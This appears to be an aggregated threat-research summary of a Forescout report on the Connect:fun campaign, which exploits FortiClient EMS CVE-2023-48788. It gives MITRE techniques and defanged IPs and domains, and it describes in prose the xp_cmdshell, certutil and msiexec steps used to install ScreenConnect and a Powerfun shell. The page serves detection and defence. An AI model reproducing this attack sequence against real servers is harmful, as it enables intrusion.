Threat Research

Connect:fun: New exploit campaign in the wild targets media company – Forescout

Securonix

The Connect:fun campaign exploits Fortinet FortiClient EMS CVE-2023-48788 to deliver post-exploitation tools such as ScreenConnect and Powerfun, targeting a media company and possibly other VPN appliance deployments. The operation shows a non-automated, targeted pattern with infrastructure tied to Vietnamese and German language usage, active since at least 2022, and includes observed logging of download and execution attempts. #ConnectFun #FortiClientEMS #ScreenConnect #Powerfun #CVE-2023-48788 #Fortinet

Keypoints

  • Campaign name Connect:fun is tied to the use of ScreenConnect and Powerfun as post-exploitation tools.
  • Exploitation centers on CVE-2023-48788 (FortiClient EMS SQL injection) with observed exploitation attempts since March 2024.
  • Attack sequence includes enabling xp_cmdshell via SQL Server and downloading/installing ScreenConnect using certutil and msiexec.
  • Payloads downloaded from the actor’s infrastructure, including a Powerfun-based script for bind/reverse shells and C2 commands.
  • Campaign shows targeting behavior (manual, non-automated probing) and infrastructure using Vietnamese/German language signals; IPs/domains overlap with prior incidents.
  • Mitigation emphasizes patching, IDS monitoring, WAF usage, and IoCs/TTPS for detection and hunting.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – FortiClient EMS CVE-2023-48788 exploited via SQL injection to gain access. Quote: “a SQL injection vulnerability in the FortiClient EMS security management solution.”
  • [T1059.003] Windows Command Shell – Commands to enable advanced configuration options and the xp_cmdshell stored procedure in SQL Server were used. Quote: “sequence of commands to enable advanced configuration options and the xp_cmdshell stored procedure in SQL Server.”
  • [T1219] Remote Services – Post-exploitation use of the ScreenConnect remote management tool to control the compromised host. Quote: “download ScreenConnect remote management tool”
  • [T1105] Ingress Tool Transfer – certutil.exe downloaded ScreenConnect and a malicious payload; payloads downloaded from external IPs. Quote: “certutil.exe to download ScreenConnect and install it using msiexec.exe.” and “download a malicious payload from 185[.]56[.]83[.]82”
  • [T1027] Obfuscated/Compressed Files and Information – Obfuscated commands used in SQL injections during the campaign. Quote: “obfuscated commands”

Indicators of Compromise

  • [IP addresses] Seen in our incident: 141[.]136[.]43[.]188, 2a02:4780:a:952:0:1e10:e79b:1, 144[.]202[.]21[.]16. Seen in other incidents: 185[.]56[.]83[.]82, 95[.]179[.]241[.]10.
  • [URLs / Domains] Seen in our incident: mci11[.]raow[.]fun. Seen in other incidents: hxxp[:]//45.227.255[.]213:20201, hxxp[:]//68[.]178[.]202[.]116, jxqmwbgxygkyftpxykdk8cfkq1hy371pz.oast[.]fun.
  • [Hostnames] “VULTR-GUEST”
  • [Domains] ursketz[.]com, ls[.]vfxtraining[.]shop

Read more: https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint